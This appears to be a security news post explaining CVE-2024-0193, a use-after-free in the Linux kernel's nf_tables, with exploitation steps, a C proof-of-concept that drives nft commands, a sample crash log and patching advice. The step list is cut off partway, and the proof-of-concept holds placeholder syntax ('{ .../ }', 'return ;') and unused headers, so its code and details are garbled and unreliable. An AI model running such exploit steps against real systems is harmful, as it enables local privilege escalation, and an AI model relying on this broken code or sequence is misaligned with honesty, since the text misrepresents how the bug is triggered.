CVE CyberSecurity Database News

CVE-2024-0193 - How a Netfilter Use-After-Free Lets Hackers Get Root on Linux

Poster -

A serious use-after-free bug, tracked as CVE-2024-0193, was recently found in the Netfilter (nf_tables) part of the Linux kernel. In short, a local attacker with basic CAP_NET_ADMIN privileges can take control of the system by abusing this bug. This post breaks down what CVE-2024-0193 is, how it works, and how it could be exploited, all in simple language. Examples, links, and code are included.

What’s Netfilter and nf_tables?

Linux uses Netfilter for packet filtering, NAT, and other networking magic. nf_tables is a framework in Netfilter that lets users create rules, chains, and sets to control network traffic. It can be managed using the nft command.

What’s The Bug (CVE-2024-0193)?

A use-after-free vulnerability exists when something in memory (like a data structure) is freed, but then used again by accident. This can cause memory corruption — and hackers love this, because it often leads to privilege escalation.

In this particular case, when a catchall element in a "pipapo" set gets removed (garbage-collected), it can be deactivated twice if the set itself is deleted. This double-deactivation leads to the use-after-free: a freed object is accessed again.

More technically: the flaw lets an attacker corrupt an NFT_CHAIN or NFT_OBJECT, because the reference counter is incorrectly handled during cleanup. If you have CAP_NET_ADMIN (unprivileged users can get it in containers, for example), you can attack the kernel, and run code as root.

Race the deletion so the catchall element is deactivated twice.

4. Reclaim the freed memory with your own data, so that when the use-after-free happens, you control what the kernel does.

Code Example & Exploit Snippet

Below is a simplified proof-of-concept that shows the bug in action. This doesn't give a full local root, but gives you the crash — a key part of maturation for a real exploit.

Requirements: Linux kernel vulnerable to CVE-2024-0193, with CAP_NET_ADMIN.

// cve-2024-0193-poc.c
// gcc cve-2024-0193-poc.c -o cve-2024-0193-poc
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <linux/netlink.h>
#include <libmnl/libmnl.h>
#include <linux/netfilter/nf_tables.h>

#define NFT_TABLE "testtab"
#define NFT_SET "testset"

int main() {
    system("nft 'add table inet " NFT_TABLE "'");
    system("nft 'add set inet " NFT_TABLE " " NFT_SET " { type ipv4_addr; flags interval; }'");
    system("nft 'add element inet " NFT_TABLE " " NFT_SET " { .../ }'");

    // Remove set and trigger bug in kernel
    printf("[*] Deleting set to trigger the use-after-free...\n");
    system("nft 'delete set inet " NFT_TABLE " " NFT_SET "'");
    // The kernel may trigger a UAF here (crash/dmesg info if vulnerable)
    
    printf("[*] Check dmesg for UAF crash logs\n");
    return ;
}

*Note: This just shows the bug trigger. Not full privilege escalation code!*

Dmesg Log Example on Vulnerable Kernel

[ 1234.567891 ] BUG: KASAN: use-after-free in nft_chain_destroy+x43/x50
[ 1234.567892 ] Read of size 8 at addr ffff88800733f800 by task nft/383

Any Linux system using vulnerable kernels (5.14+ before patches in January 2024)

- Unprivileged users with at least CAP_NET_ADMIN (for example, inside containers, or any user who can use nftables)
- Cloud providers, shared hosting, Kubernetes clusters: All may be at risk if they let anyone configure firewalling.

Upgrade your kernel! All major Linux distributions have patches

- Red Hat Security Advisory
- Debian Security Tracker
- Linux Kernel Commit

References

- CVE-2024-0193 at NVD
- Red Hat Security Advisory
- Linux Kernel Patch (git.kernel.org)
- Original discovery (oss-sec)

Final Thoughts

CVE-2024-0193 is a classic example of how "just a firewall bug" can lead to full system compromise. All sysadmins and DevOps folks should upgrade their kernels and audit who has CAP_NET_ADMIN. If you’re running containers or multi-tenant systems, patch ASAP.

For security researchers, this bug is a great case study in how subtle kernel logic errors end up leading to exploitation — and why sandboxing and minimal privileges always matter.

Timeline

Published on: 01/02/2024 18:15:08 UTC
Last modified on: 02/28/2024 15:15:08 UTC